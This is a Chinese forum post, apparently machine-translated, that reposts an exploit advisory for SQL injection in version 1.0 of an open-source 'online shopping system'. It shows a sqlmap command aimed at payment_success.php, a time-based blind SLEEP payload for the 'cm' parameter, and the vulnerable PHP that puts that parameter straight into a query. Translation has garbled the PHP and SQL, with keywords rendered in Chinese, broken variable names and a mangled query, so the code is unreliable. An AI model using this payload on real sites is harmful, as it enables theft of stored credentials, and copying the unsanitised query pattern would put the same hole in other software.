H

在线购物系统高级-SQL注入

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:在线购物系统高级
#date: 07.12.2023
#利用作者: Furkan Gedik
#供应商homepage3360 https://github.com/puneethreddyhc/online-shopping-system-Advanced
#软件link: https://github.com/puneethreddyhc/online-shopping-system-vanced
#版本: 1.0
#测试在: [Kali Linux 2020.3]
# 描述
通过注入恶意SQL语句来未经授权访问数据库。 SQL注入漏洞是由于在SQL查询中包含了用户提供的“ CM”参数,而无需过滤或消毒。攻击者可以通过在“ CM”参数中注入恶意SQL代码来利用漏洞。成功利用漏洞会导致从数据库中披露敏感信息,例如用户凭据,可用于获得对数据库的未经授权访问。
#poc
[+] SQLMAP输出
sqlmap.py -u 'http://localhost/online-shopping-system-advanced/payment_success.php?st=Completedcm=1' -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080
参数: cm(GET)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ST=已完成=1'和(从(Select(Sleep(5)))NRHH)和'jlpv'='JLPV
#漏洞
[+] payment_success.php
if(isset($ _ get ['st'])){
# 代码.
$ trx_id=$ _get ['tx'];
$ p_st=$ _get ['st'];
$ amt=$ _get ['amt'];
$ cc=$ _get ['cc'];
$ cm_user_id=$ _get ['cm'];
$ c_amt=$ _cookie ['ta'];
如果($ p_st=='已完成'){
include_once('db.php');
$ sql='select p_id,从cart where user_id='$ cm_user_id''qty';
 
后退
顶部